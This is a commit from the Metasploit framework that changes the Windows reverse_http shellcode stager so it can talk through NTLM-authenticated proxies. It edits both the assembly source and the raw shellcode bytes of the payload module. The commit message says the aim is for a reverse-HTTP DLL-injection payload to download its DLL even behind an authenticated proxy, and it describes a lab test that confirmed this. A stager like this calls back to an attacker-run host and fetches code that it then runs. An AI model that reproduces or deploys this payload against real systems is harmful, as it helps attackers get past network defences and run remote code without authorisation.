Allow HTTP stager to work with authenticated proxies

The HttpOpenRequest function from WinINet requires the INTERNET_FLAG_KEEP_CONNECTION flag to communicate through an authenticated proxy. From MSDN ( http://tinyurl.com/chwt86j ): "Uses keep-alive semantics, if available, for the connection. This flag is required for Microsoft Network (MSN), NT LAN Manager (NTLM), and other types of authentication." Without this flag, the HTTP stager will fail when faced with a proxy that requires authentication. The Windows HTTPS stager does not have this problem. For HTTP Meterpreter to communicate through an authenticated proxy a separate patch will need to be made to the Meterpreter source code. This is at line 1125 of source/common/core.c in the Meterpreter source code. My motivation for this request is for windows/dllinject/reverse_http to download a DLL even when faced with an authenticated proxy. These changes accomplish this. Test environment: I staged a SmoothWall device with the Advanced Proxy Web Add-on. I enabled Integrated Windows Authentication with a W2K3 DC. I verified the HTTP stager authenticated to and communicated through the proxy by watching the proxy access.log
2013-02-24 17:33:00 -05:00 · 2013-02-24 17:33:00 -05:00 · 788c96566f
parent 0977d1a9b0
commit 788c96566f
2 changed files with 4 additions and 3 deletions
--- a/external/source/shellcode/windows/x86/src/block/block_reverse_http.asm
+++ b/external/source/shellcode/windows/x86/src/block/block_reverse_http.asm
@ -49,11 +49,12 @@ httpopenrequest:
  pop ecx
  xor edx, edx           ; NULL
  push edx               ; dwContext (NULL)
-  push (0x80000000 | 0x04000000 | 0x00200000 | 0x00000200) ; dwFlags
+  push (0x80000000 | 0x04000000 | 0x00200000 | 0x00000200 | 0x00400000) ; dwFlags
    ;0x80000000 |        ; INTERNET_FLAG_RELOAD
    ;0x04000000 |        ; INTERNET_NO_CACHE_WRITE
 	;0x00200000 |        ; INTERNET_FLAG_NO_AUTO_REDIRECT
-    ;0x00000200          ; INTERNET_FLAG_NO_UI
+    ;0x00000200 |        ; INTERNET_FLAG_NO_UI
+    ;0x00400000          ; INTERNET_FLAG_KEEP_CONNECTION
  push edx               ; accept types
  push edx               ; referrer
  push edx               ; version
--- a/modules/payloads/stagers/windows/reverse_http.rb
+++ b/modules/payloads/stagers/windows/reverse_http.rb
@ -47,7 +47,7 @@ module Metasploit3
 							"\xFF\xD5\x31\xFF\x57\x57\x57\x57\x6A\x00\x54\x68\x3A\x56\x79\xA7" +
 							"\xFF\xD5\xEB\x4B\x5B\x31\xC9\x51\x51\x6A\x03\x51\x51\x68\x5C\x11" +
 							"\x00\x00\x53\x50\x68\x57\x89\x9F\xC6\xFF\xD5\xEB\x34\x59\x31\xD2" +
-							"\x52\x68\x00\x02\x20\x84\x52\x52\x52\x51\x52\x50\x68\xEB\x55\x2E" +
+							"\x52\x68\x00\x02\x60\x84\x52\x52\x52\x51\x52\x50\x68\xEB\x55\x2E" +
 							"\x3B\xFF\xD5\x89\xC6\x6A\x10\x5B\x31\xFF\x57\x57\x57\x57\x56\x68" +
 							"\x2D\x06\x18\x7B\xFF\xD5\x85\xC0\x75\x1A\x4B\x74\x10\xEB\xE9\xEB" +
 							"\x49\xE8\xC7\xFF\xFF\xFF\x2F\x31\x32\x33\x34\x35\x00\x68\xF0\xB5" +